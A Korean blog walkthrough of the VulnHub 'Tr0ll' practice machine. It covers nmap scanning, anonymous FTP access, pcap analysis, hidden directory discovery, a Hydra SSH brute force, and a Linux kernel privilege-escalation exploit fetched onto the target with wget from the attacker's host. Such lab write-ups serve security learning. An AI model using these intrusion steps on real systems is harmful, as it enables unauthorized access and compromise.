VulnHub

VulnHub | Tr0ll - 모의해킹

cybermad 2025. 11. 16. 15:23

정보수집

arp-scan -l

 

먼저 해당 랩에 아이피를 수집후

 

nmap 을 통하여 포트 스캔을 해주겠습니다

nmap -A -sV -P -T4 192.168.190.129

 

nmap -A -sV -P -T4 192.168.190.129
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-15 23:53 EST
Nmap scan report for 192.168.190.129
Host is up (0.0014s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.190.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:B7:9D:28 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.44 ms 192.168.190.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.57 seconds

 

현재

21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux;
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

 

포트가 열려 있습니다

 

또한

ftp-anon: Anonymous FTP login allowed (FTP code 230)

 

FTP 서버에 익명으로 로그인할수 있는 권한또한 있네요

 

FTP 서버에 로그인 해보겠습니다

ftp 192.168.190.129

 

lol.pcap 이란 파일을 발견했습니다

 

get 명령어를 통해 이파일을 다운로드 해주겠습니다

get lol.pcap

PCAP 이란?

PCAP은 네트워크 트래픽을 캡처하기 위한 API와 이 API를 이용해 수집된 패킷 데이터가 저장되는 파일 형식을 모두 가리킵니다. libpcap 라이브러리(유닉스 계열) 또는 WinPcap/Npcap(윈도우)을 통해 네트워크 트래픽을 캡처하고, 수집된 패킷들은 .pcap 확장자 파일로 저장됩니다. 

 

쉽게말해 수집된 패킷 정보가 lol.pcap 에 담긴다는 말

 

wireshark 를 통해 lol.pcap 을 분석해봅시다

 

또한 FTP 는 암호화되지 않은 네트워크 트래픽이다 그러므로

TCP steam 을 통하여 다운로드 기록이나 명령어를 친 기록을 열어볼수 있었습니다

 

여기서 

 

secret_stuff.txt

 

수상한 파일을 확인했습니다

 

ftp-data 를 통하여 숨겨진 텍스트 파일에 내용을 확인해봅시다

)]) pEO@@,

EkHV
WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close... gotta TRY HARDER!

 

중요한 텍스트를 얻었습니다

sup3rs3cr3tdirlol

 

80/tcp Apache 서버에도 들어가봅시다

트롤이다 여기선 특별한게 없는거 같습니다

gobuster 를 통하여 해당 숨겨진 디렉토리를 스캔해봅시다

/secret               (Status: 301) [Size: 318] [--> http://192.168.190.129/secret/]
/server-status        (Status: 403) [Size: 295]

 

해당 경로로 이동후

U MAD?

트롤 메세지만 있고 특별한건 없습니다 다른 경로도 확인해봅시다

다른경로도 마찬가지로 특별한건 없는걸 확인했습니다

랩 설명대로 트롤이 너무 많아 해맸습니다 하지만 여러가지 시도해본 결과.

sup3rs3cr3tdirlol

 

좀전에 얻는 수상한 문구를 통하여 /sup3rs3cr3tdirlol 경로로 들어가보겠습니다

오 성공적으로 해당 경로에 진입했습니다

roflmao 라는 파일이 있는데 다운로드 해보겠습니다

 

음 이파일을 이제 어쩌라는 건지

생각을 좀 해본결과 nano 편집기로 열어봤는데

Find address 0x0856BF to proceed

 

이란 문구를 확인했다

아니 분명 쉬운문젠데

일단 AI 가 하라는 대로 진행해봤다

 

일단 AI 가 하라는대로 진행은 해보고

대화도 해봤는데 전혀 도움이 안됬습니다 또한 gdb 사용법을 몰라 어려움을 겪었습니다

 

그후 다른방법을 찾아보면서 서치좀 해본결과

 

 

해당 경로로 진입을 성공했습니다

두가지 파일이 있었는데 둘다 들어가보겠습니다

 

Pass.txt

 

which_one_lol.txt

 

which_one_lol.txt 이걸보니 wordlist 파일이란걸 확인했습니다

which_one_lol.txt wordlist 파일을 통하여 ssh 서버를 bruteforce 해주겠습니다

Hydra

 

Hydra 로 ssh 를 크랙해줬으나 역시나 Pass.txt 내용이 단순한걸 Good_job_:) 이 패스워드가 되지 못했습니다

그러므로 생각을 좀 해보다가 서치를 좀 해본뒤

드디어

패스워드가 Pass.txt....

아무튼 ssh 서버에 로그인을 할수 있게 되였습니다

 

권한상승

 

현재 ssh 서버 커널

Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux

 

 

 

해당 커널에 맞는 exploit db 를 찾아보겠습니다

https://www.exploit-db.com/exploits/33321

 

해당 exploit 복사해

서버를 열어준다음 ssh 서버에 exploit 을 다운로드 해주겠습니다

 

wget -O 37292.c 192.168.190.128:4444/37292.c

 

해당 exploit 을 wget 으로 다운받아준후

해당 exploit 을 실행해주면

 

성공적으로 flag 를 획득한걸 볼수 있습니다

 

여기까지 봐주셔서 감사합니다.